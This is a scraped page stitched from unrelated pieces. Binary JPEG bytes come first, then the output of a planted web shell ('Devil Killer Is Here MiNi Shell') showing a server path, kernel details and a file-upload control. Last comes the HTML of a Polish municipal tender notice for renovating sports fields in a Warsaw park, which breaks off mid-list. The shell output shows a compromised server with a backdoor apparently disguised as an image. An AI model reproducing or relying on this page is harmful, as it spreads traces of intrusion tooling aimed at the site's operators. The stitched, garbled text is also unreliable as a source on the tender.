JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240411/0028200601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych dla zadania pn.: Remont boisk w Parku im. Józefa Polińskiego przy ul. Szaserów w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd m.st. Warszawy Dzielnica Praga-Południe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grochowska 274</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-841</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 224435509</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pragapoludnie.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pragapld.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych dla zadania pn.: Remont boisk w Parku im. Józefa Polińskiego przy ul. Szaserów w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7181ff15-f716-11ee-8d01-6607a228ef1b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00282006</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00031007/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Remont boisk w Parku im. Józefa Polińskiego przy ul. Szaserów w Warszawie - część 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">SWZ Rozdz. 2 i 24 pkt 4</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dot. ochrony danych osobowych określona załącznik 14 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dot. ochrony danych osobowych określona załącznik 14 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-VI-ZP/11/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I.	Przedmiotem zamówienia jest:<br/>Wykonanie robót budowlanych dla zadania pn.: Remont boisk w Parku im. Józefa Polińskiego przy ul. Szaserów w Warszawie<br/><br/>1.	Opis przedmiotu zamówienia<br/>Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn.: „Remont boisk w Parku im. Józefa Polińskiego przy ul. Szaserów w Warszawie”. Inwestycja zlokalizowana jest na działce ew. nr 121/17 z obrębu 3-04-07 w Dzielnicy Praga-Południe.<br/>Celem inwestycji jest.<br/><br/>2.	Zestawienie powierzchni<br/>•	Powierzchnia boiska piłkarskiego ze sztucznej trawy 1 860,0 m2<br/>•	Powierzchnia boiska wielofunkcyjnego o nawierzchni poliuretanowej 608,0 m2 <br/>•	Powierzchnia nowego chodnika 333,4 m2 <br/>•	Długość ogrodzenia do zmiany na piłkochwyty 211,4 m.b.<br/>•	Długość piłkochwytów 50,0 m.b.<br/>•	Długość nowego ogrodzenia 210,4 m.b.<br/>•	Powierzchnia zabudowy budynku 83,0 m2<br/><br/>3.	Prawo opcji<br/>Ze względu na obecnie posiadane ograniczone środki finansowe Zamawiający:<br/>planuje podczas postępowania przetargowego zastosowanie prawa opcji zgodnie z art. 441 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.).<br/>Oferent przedłoży ofertę na realizację zadania podstawowego oraz poda cenę realizacji opcji. Oferent zagwarantuje cenę i możliwość ewentualnej realizacji inwestycji w dodatkowym zakresie.<br/>Zamawiający będzie miał prawo skorzystania z prawa opcji w zagwarantowanej przez oferenta cenie lub realizację przedmiotu umowy w zakresie podstawowym (gwarantowanym).<br/><br/>4.	Zakres rzeczowy robót stanowiący przedmiot umowy w szczególności obejmuje:<br/>1)	Zamówienie podstawowe (gwarantowane):<br/>a)	Wykonanie projektu czasowej organizacji ruchu wraz z uzyskaniem niezbędnych map, opinii, warunków, uzgodnień, zatwierdzeń.<br/>b)	Prace przygotowawcze tj., zabezpieczenie terenu budowy - BHP, sporządzenie planu BIOZ, przygotowanie zaplecza, wytyczenie geodezyjne.<br/>c)	Prace rozbiórkowe w tym wywóz, utylizacja lub przekazanie do recyklingu materiałów <br/>z rozbiórki. Rozbiórce podlegają: nawierzchnie boisk z częściową rozbiórką podbudowy, siatki piłkochwytów, część słupów piłkochwytów, bramki piłkarskie i kosze do koszykówki, części ogrodzenia.<br/>d)	Wykonanie nawierzchni boiska piłkarskiego z trawy syntetycznej wraz z uzupełnieniem <br/>i przygotowaniem podbudowy.<br/>e)	Wykonanie nawierzchni boiska wielofunkcyjnego z nawierzchni poliuretanowej<br/> z zastosowaniem ET wraz z uzupełnieniem i przygotowaniem podbudowy.<br/>f)	Wykonanie piłkochwytów: nowych słupów piłkochwytów, remont pozostawianych słupów piłkochwytów, wykonanie siatki piłkochwytów.<br/>g)	Wykonanie ogrodzenia z 4 furtkami.<br/>h)	Zakup, dostawa i montaż bramek piłkarskich i koszy do koszykówki.<br/>i)	Rekultywacja trawnika, prace porządkowe.<br/><br/>2)	Zamówienie opcjonalne – prawo opcji:<br/>a)	Wykonanie oświetlenia, demontaż istniejących projektorów i montaż nowych projektorów.<br/>b)	Remont budynku (zaplecza).<br/>c)	Wybudowanie chodnika z kostki betonowej wraz z podbudową i obrzeżami.<br/><br/>Szczegółowy zakres przedmiotu zamówienia określa dokumentacja techniczna tj.: Projekt wykonawczy pn.: „Remont boisk w Parku im. Józefa Polińskiego ul. Szaserów, Warszawa dz. nr ew. 121/17 obręb 30407”, Specyfikacja techniczna wykonania i odbioru robót budowlanych oraz przedmiar robót stanowiące załącznik nr 1 do umowy. <br/>3)	W zakresie robót do wykonania znajdują się wszystkie prace, jakie należy wykonać, aby wykonane elementy spełniały zakładaną funkcję oraz te, które wynikają z technologii robót, sztuki budowlanej, przepisów prawa budowlanego, nawet jeśli nie były oddzielnie opisane w specyfikacji technicznej wykonania i odbioru robót, wraz z usunięciem wszelkich wad i usterek związanych z wykonaniem robót.<br/>4)	Wykonawca oświadcza, że:<br/>a.	zapoznał się z terenem, warunkami technicznymi realizacji przedmiotu umowy oraz dokumentacją techniczną - zweryfikował przedmiary robót z stanem rzeczywistymi <br/>i dokumentacją techniczną, dokonał ich sprawdzenia i nie wnosi zastrzeżeń do ich zgodności i kompletności,<br/>b.	dokumentację j.w. uznaje za wystarczającą podstawę do realizacji przedmiotu umowy,<br/>c.	dostarczy, w dniu podpisania umowy szczegółowy kosztorys ofertowy stanowiący załącznik nr 2 do umowy oraz Harmonogram rzeczowo – finansowy stanowiący załącznik nr 3 do umowy.<br/>5)	Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, lub skorzystać z niego w mniejszym zakresie, w szczególności w przypadku nieuzyskania środków finansowych na ten cel, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia, na co Wykonawca wyraża zgodę i akceptuje warunki określone w umowie oraz dokumentacji przetargowej.<br/>6)	Zawiadomienie o uruchomieniu prawa opcji zostanie przedstawione Wykonawcy w formie pisemnej doręczonym osobiście lub drogą elektroniczną (skan pisma przy emailu), nie później niż do 10 tygodni od dnia zawarcia umowy.<br/>7)	Koszt wynagrodzenia za wybrany zakres robót opcjonalnych określa oferta wykonawcy i kosztorys ofertowy stanowiący załącznik nr 2 do umowy.<br/>8)	W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na warunkach określonych w umowie, dokumentacji przetargowej i sporządzonej przez Wykonawcę oferty.<br/><br/>5.	Dodatkowe informacje<br/>1)	Zamawiający zaleca przeprowadzenie wizji lokalnej ternu inwestycji (zapisy we wzorze umowy § 1 ust. 4 pkt 1).<br/>2)	Prace prowadzone będą na terenie Parku im. J. Polińskiego w związku z tym Wykonawca zobowiązany jest do szczególnej troski o zieleń. Drzewa w otoczeniu ternu budowy należy odpowiednio zabezpieczyć oraz nie wolno składować materiałów budowalnych ani rozbiórkowych w obrębie koron drzew. <br/>3)	Opracowanie przez Wykonawcę na własny koszt projektu organizacji ruchu na cele dojazdu na teren budowy wraz z uzyskaniem niezbędnych map, opinii, warunków, uzgodnień i z zatwierdzeniem przez Biuro Zarządzania Ruchem Drogowym, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem (t.j. Dz.U. z 2017 poz. 784). <br/>Zamawiający planuje wykonanie wjazdu na budowę od ulicy Garwolińskiej, bramą na wprost <br/>ul. Szaserów.<br/>Wykonawca z na własny koszt zorganizuje wjazd na teren budowy zgodnie z zatwierdzonym projektem organizacji ruchu, po zakończeniu robót elementy te zobowiązany jest usunąć.<br/>4)	Po zakończeniu robót budowalnych Wykonawca zobowiązany w przypadku uszkodzeń do odtworzenia nawierzchni chodników, trawników i innych elementów parku. Prace te będą podlegały odbiorowi wraz z odbiorem końcowym robót budowalnych.<br/>5)	Po dostarczeniu systemu trawy syntetycznej na budowę Wykonawca na własny koszt zleci wykonanie badań mających na celu potwierdzenie zgodność parametrów dostarczonego systemu trawy (trawy syntetycznej i granulatu EPDM) z projektem wykonawczym. Zamawiający dokona odbioru robót i rozliczenia jedynie w przypadku otrzymania wyniku badań - potwierdzających zgodność parametrów wbudowanego systemu trawy z projektem wykonawczym (będącym załącznikiem do SWZ) oraz zgodnym z rozporządzeniem REACH. <br/>Badanie trawy syntetycznej dotyczyć będzie ilość pęczków, ilość włókien, wagi całkowitej, wagi włókna, grubość włókna, Dtex oraz siły wyrywania pęczka po starzeniu. Badanie trawy syntetycznej powinno być wykonane przez Instytut Sportu - Państwowy Instytut Badawczy lub inną jednostkę akredytowaną przez FIFA lub PCA w zakresie nawierzchni z trawy sztucznej.<br/>Badanie granulatu EPDM do wypełnienia boiska z trawy syntetycznej dotyczyć będzie zgodność z Rozporządzeniem REACH oraz normą PN-EN 71-3, obejmujące: badanie zawartości wielopierścieniowych węglowodorów aromatycznych WWA (REACH), badanie zawartości kadmu (Cd) (REACH), badanie migracji pierwiastków, zgodnie z PN-EN 71-3 (tj. Al, Sb, As, Ba, B, Cd, Cr (III), Cr (VI), Co, Cu, Pb, Mn, Hg, Ni, Se, SR, Sn, Zn, zgodnie z PN-EN 71-3 (III kategoria)), badanie migracji związków cynoorganicznych, zgodnie z PN-EN 71-3 (III kategoria), badanie zawartości ftalanów (REACH). Badanie granulatu powinno być wykonane przez Instytut badawczy np. Instytut Techniki Górniczej KOMAG.<br/>Wykonawca zobowiązany jest do przedstawienia jednostki badawczej do akceptacji zamawiającemu. Badania przeprowadzane będą w całości na koszt wykonawcy.<br/>Próbki materiałów do badań pobierane będą na terenie budowy, komisyjnie przy udziale przedstawiciela zamawiającego, wykonawcy oraz jeśli to będzie możliwe przy udziale przedstawiciela jednostki badawczej. Próbkę wysyłać będzie zamawiający lub zostanie ona przekazana bezpośrednio na budowie przedstawicielowi jednostki badawczej.<br/>6)	W przypadku wystąpienia robót dodatkowych, zamiennych lub zaniechanych rozliczenie nastąpi na podstawie cen jednostkowych podanych w kosztorysie ofertowym będącym załącznikiem nr 2 do umowy w przypadku braku odpowiednich pozycji w kosztorysie ofertowym na podstawie średnich pozycji KNR, cen aktualnego cennika Sekocenbud lub oferty producenta/hurtowni.<br/><br/>II.	Szczegółowy opis oraz zakres robót określają załączniki nr 9, 10, 11, 12 i 13 do SWZ.<br/>III.	Dodatkowe obowiązki Wykonawcy wynikające z klauzuli społecznej w oparciu o art. 95 ust. 1 ustawy Pzp<br/>Zamawiający wymaga, aby Wykonawca lub Podwykonawca przez cały okres realizacji zamówienia zatrudniał na podstawie stosunku pracy w rozumieniu art. 22 § 1 ustawy z dnia 26.06.1974 r. Kodeks Pracy (Dz.U. z 2023 r. poz. 1465 t.j.) pracowników/pracownika bezpośrednio realizujących prace na terenie budowy, wykonujących następujące czynności: roboty związane m.in.: z budowaniem nawierzchni boisk sportowych i robót związanych z montażem elementów małej architektury.<br/>Powyższy warunek zostanie spełniony poprzez nawiązanie stosunku pracy z nowymi pracownikami/pracownikiem lub wyznaczenie do realizacji zamówienia pracowników/pracownika zatrudnionych już u Wykonawcy lub Podwykonawcy. <br/>Szczegółowe wymogi określa § 5 Wzoru umowy (załącznik nr 9 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamówienie opcjonalne – prawo opcji:<br/>a)	Wykonanie oświetlenia, demontaż istniejących projektorów i montaż nowych projektorów.<br/>b)	Remont budynku (zaplecza).<br/>c)	Wybudowanie chodnika z kostki betonowej wraz z podbudową i obrzeżami.<br/>2.	Prawo opcji<br/>Ze względu na obecnie posiadane ograniczone środki finansowe Zamawiający:<br/>planuje podczas postępowania przetargowego zastosowanie prawa opcji zgodnie z art. 441 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.).<br/>Oferent przedłoży ofertę na realizację zadania podstawowego oraz poda cenę realizacji opcji. Oferent zagwarantuje cenę i możliwość ewentualnej realizacji inwestycji w dodatkowym zakresie.<br/>Zamawiający będzie miał prawo skorzystania z prawa opcji w zagwarantowanej przez oferenta cenie lub realizację przedmiotu umowy w zakresie podstawowym (gwarantowanym).<br/>3.	Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, lub skorzystać z niego w mniejszym zakresie, w szczególności w przypadku nieuzyskania środków finansowych na ten cel, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia, na co Wykonawca wyraża zgodę i akceptuje warunki określone w umowie oraz dokumentacji przetargowej.<br/>4.	Zawiadomienie o uruchomieniu prawa opcji zostanie przedstawione Wykonawcy w formie pisemnej doręczonym osobiście lub drogą elektroniczną (skan pisma przy emailu), nie później niż do 10 tygodni od dnia zawarcia umowy.<br/>5. Koszt wynagrodzenia za wybrany zakres robót opcjonalnych określa oferta wykonawcy i kosztorys ofertowy stanowiący załącznik nr 2 do umowy.<br/>6. W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na warunkach określonych w umowie, dokumentacji przetargowej i sporządzonej przez Wykonawcę oferty.<br/>7. Wartość zadania opcjonalnego: 272 744,55 zł netto.<br/>8.	Termin wykonania przedmiotu umowy w ramach zamówienia podstawowego (gwarantowanego) ustala się:<br/>1)	wykonanie projektu tymczasowej organizacji ruchu zatwierdzonej przez Biuro Zarządzania Ruchem Drogowym do 10 tygodni od dnia zawarcia umowy,<br/>2)	wykonanie robót budowlanych do 18 tygodni od dnia zawarcia umowy.<br/>9.	Termin wykonania przedmiotu umowy w ramach zamówienia opcjonalnego ustala się do 20 tygodni od dnia zawarcia umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">126 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Rozdz. 20 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto dla zadania opcjonalnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia publicznego mogą się ubiegać Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu, <br/>b)	spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ.<br/>2.	Podstawy wykluczenia:<br/>Zamawiający wykluczy z postępowania Wykonawców, w stosunku do których zachodzą przesłanki wykluczenia wskazane w:<br/>a)	art. 108 ust. 1 ustawy Pzp,<br/>b)	art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2023 r., poz. 1497 ze zm.).<br/><br/>3.	Warunki udziału w postępowaniu:<br/>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy na potwierdzenie zdolności technicznej lub zawodowej wykażą, że:<br/>1)	w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizowali co najmniej 2 roboty budowlane polegające na wybudowaniu i/lub przebudowaniu boiska o nawierzchni ze sztucznej trawy lub/i nawierzchni poliuretanowej, o wartości nie mniejszej niż 500 000,00 zł brutto każda. <br/>Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (np..: referencje, poświadczenie, protokół odbioru m.in. potwierdzający terminowe wykonanie robót, w przypadku wykazu usterek należy przedstawić dokument potwierdzający ich usunięcie).<br/><br/>2) dysponują osobami, skierowanymi do realizacji niniejszego zamówienia, w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi, w tym co najmniej:<br/>a)	